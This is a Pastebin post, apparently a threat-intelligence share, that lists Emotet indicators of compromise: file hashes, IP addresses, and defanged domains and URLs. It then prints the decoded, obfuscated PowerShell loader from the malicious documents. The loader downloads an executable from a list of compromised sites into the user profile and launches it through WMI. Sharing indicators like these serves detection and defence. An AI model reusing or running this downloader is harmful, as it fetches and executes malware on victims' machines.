Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #Emotet #Docs #malware #OSINT #IOC
- SHA256:
- 37df1c897498e12038bca3c4ae4d02776ab77d84a6e33bac3593b15667f858b4
- b1d7b40258d9992759f67e3bd54fbb74a2f49734944fd6552c8fb10dcd967adb
- 6fc4a92196feef5bda8bdb05e2b5b05eb2c48450f60012863701e05f4aa73d03
- 5784596ff2c505653b8224d4e05914e5ec6d6844b3504268fdf152e6599e8331
- 48623cdba9af101991ee00bc2ff9ca3a5f83e5c70df0c7a7de313f41588f6349
- 58e6e19cb9159d73ba06ee2f9c774a5cf85a7f121452209a1d81f01ccc0deff4
- bf467bc7b27db7f31f5130fa89c4b97d9ab7c4e87e4d8e1c2b9398e0f8337983
- c72f6dd3870ea0daab032035a6a75457049d61271108aed09b813e0a61951f63
- 00f8f8d56720bada858c0e24c0c8c5c3bb3c360a941557055763513ddc728c9a
- 06b64e2e53c08beba1406ecb836952a5dd862fd465f5c7ff102f4f950d5430f8
- 97871c5963b97b79ce2d971be6184c2061ee2581980e067e3dee631dff7f7470
- fdb9005001ddb9dcaffdb590dd9fab7761288adcc49b6d78d9cf3d444281e7da
- IPs:
- 104.20.106.5
- 104.20.107.5
- 123.31.31.47
- 162.213.248.207
- 185.165.116.18
- 185.72.146.155
- 188.253.2.205
- 205.144.171.80
- 3.86.33.96
- 51.255.215.166
- 54.208.104.124
- Domains:
- blog.prodigallovers.com
- gatelen-002-site1.htempurl.com
- khoshrougallery.com
- kobo.nhanhwebvn.com
- legal.dailynotebook.org
- ourproductreview.in
- ta-behesht.ir
- tatcogroup.ir
- tcpartner.ru
- tepcian.utcc.ac.th
- hxxp://ta-behesht.ir/images/Provx00a/
- hxxp://tatcogroup.ir/wp-admin/UC/
- hxxp://tcpartner.ru/wp-includes/nr8/
- hxxp://tepcian.utcc.ac.th/wp-admin/SquR/
- hxxp://ourproductreview.in/pokjbg746ihrtr/a1kzwc/
- hxxp://kobo.nhanhwebvn.com/wp-admin/Cy4bJWG2PW/
- hxxp://khoshrougallery.com/cgi-bin/fINL/
- hxxp://legal.dailynotebook.org/wp-includes/K3601365/
- hxxp://gatelen-002-site1.htempurl.com/6jfdf/yLv61/
- hxxp://blog.prodigallovers.com/wp-content/SO10/
- Decoded Base64 Powershell:
- $Evizklrl='Zpxlmpjesfu';
- $Nazcyjtbtbhwj = '879';
- $Pjigzgyiukxvz='Lvpbpzuwqhly';
- $Djaaouswnbrhy=$env:userprofile+'\'+$Nazcyjtbtbhwj+'.exe';
- $Wihijkbdllr='Vmnqqkmhkfvx';
- $Kqvfoxypez=&('new'+'-ob'+'ject') nEt.WebcLIENT;
- $Algyovsmnirll='hxxp://ta-behesht.ir/images/Provx00a/
- hxxp://tatcogroup.ir/wp-admin/UC/
- hxxp://tcpartner.ru/wp-includes/nr8/
- hxxp://tepcian.utcc.ac.th/wp-admin/SquR/
- hxxp://ourproductreview.in/pokjbg746ihrtr/a1kzwc/'."sP`lIT"([char]42);
- $Mrynihqxcqnp='Hkdkzhzkcrv';
- foreach($Xhipsvwp in $Algyovsmnirll){try{$Kqvfoxypez."dOwnL`O`ADFIle"($Xhipsvwp, $Djaaouswnbrhy);
- $Jmclkjqp='Xiiaxkwcaw';
- If ((.('Get'+'-I'+'tem') $Djaaouswnbrhy)."Le`NgTh" -ge 37432) {([wmiclass]'win32_Process')."CRE`ATe"($Djaaouswnbrhy);
- $Ckxsucohstchl='Cgxavxfbr';
- break;
- $Zgovrhjm='Mqvnxffo'}}catch{}}$Mlrztzvecwjg='Ciswcvxyzeqq'$Yyevdkfpmaiyt='Rsszsmutgtx';
- $Kezdhvwbpxqcj = '228';
- $Nvpwfxcoj='Fpndzwcmzf';
- $Ddxyzcwasf=$env:userprofile+'\'+$Kezdhvwbpxqcj+'.exe';
- $Jlkeexbgfj='Ftcorndigmmxg';
- $Botrnfhnigg=.('new-o'+'b'+'je'+'ct') nET.weBCLIENt;
- $Wtkwsqtpxgyv='hxxp://kobo.nhanhwebvn.com/wp-admin/Cy4bJWG2PW/
- hxxp://khoshrougallery.com/cgi-bin/fINL/
- hxxp://legal.dailynotebook.org/wp-includes/K3601365/
- hxxp://gatelen-002-site1.htempurl.com/6jfdf/yLv61/
- hxxp://blog.prodigallovers.com/wp-content/SO10/'."s`plit"([char]42);
- $Xutwapkfk='Xqhfhwgnxguo';
- foreach($Kxgxcruxoot in $Wtkwsqtpxgyv){try{$Botrnfhnigg."dO`w`NLoad`FIlE"($Kxgxcruxoot, $Ddxyzcwasf);
- $Codwynxope='Mhkunrtyqn';
- If ((&('Ge'+'t'+'-Item') $Ddxyzcwasf)."l`EnGth" -ge 21090) {([wmiclass]'win32_Process')."c`Re`ATE"($Ddxyzcwasf);
- $Qqssbcgyk='Hilhviac';
- break;
- $Jzdcsduwwonbs='Evocfncijnefm'}}catch{}}$Myhjgropi='Bnjnfqdkqm'
Advertisement
Add Comment
Please, Sign In to add comment